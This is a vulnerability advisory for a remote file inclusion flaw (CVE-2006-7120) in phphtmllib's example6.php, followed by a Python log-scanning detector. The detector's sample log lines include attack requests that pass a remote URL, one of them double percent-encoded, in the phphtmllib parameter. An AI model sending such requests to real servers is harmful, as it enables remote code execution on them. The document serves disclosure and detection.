PT-2007-1398 · Php · Phphtmllib+1

Erne +1 · Published 2007-03-06 · Updated 2024-08-07 · CVE-2006-7120

CVSS v2.0: 10 (High)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Name of the Vulnerable Software and Affected Versions
lib/php/phphtmllib-2.5.4 maintain version 3.0.0-RC2

Description
A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the phphtmllib parameter. This issue might be related to phpHtmlLib. It is noted that proper installations of maintain might not be affected since the $phphtmllib variable is set before being used.

Recommendations
For maintain version 3.0.0-RC2, ensure that the $phphtmllib variable is properly set in includes.inc before being used in example6.php to prevent exploitation. For lib/php/phphtmllib-2.5.4, consider restricting access to the example6.php file until a fix is available.
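
A detection check for the pattern described above, added here as an example and not part of the original advisory or of either project: it scans web server access logs for requests to example6.php that pass a URL in the phphtmllib parameter. The combined log format, the function names, the /app/ path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address and request target from a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, ...) or a protocol-relative "//".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client ip, decoded value) for requests passing a URL in phphtmllib to example6.php."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        if not fully_unquote(parts.path).lower().endswith("/example6.php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_unquote(value)
            if name.lower() == "phphtmllib" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder host and path).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2007:10:00:00 +0000] "GET /app/example6.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Mar/2007:10:00:05 +0000] "GET /app/example6.php?phphtmllib=http://remote.example/x HTTP/1.1" 200 90',
    '198.51.100.8 - - [06/Mar/2007:10:00:09 +0000] "GET /app/example6.php?phphtmllib=%2568ttp%253A%252F%252Fremote.example%252Fx HTTP/1.1" 200 90',
    '203.0.113.5 - - [06/Mar/2007:10:00:12 +0000] "GET /app/example6.php?phphtmllib=/var/www/lib HTTP/1.1" 200 512',
    '203.0.113.6 - - [06/Mar/2007:10:00:15 +0000] "GET /app/index.php?phphtmllib=http://remote.example/x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} passed a URL in phphtmllib: {value}")
```

A match only shows that a request of this shape was made; whether it had any effect depends on whether $phphtmllib was already set before use, as the description notes.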

Related Identifiers

CVE-2006-7120

Affected Products

Lib/Php/Phphtmllib
Phphtmllib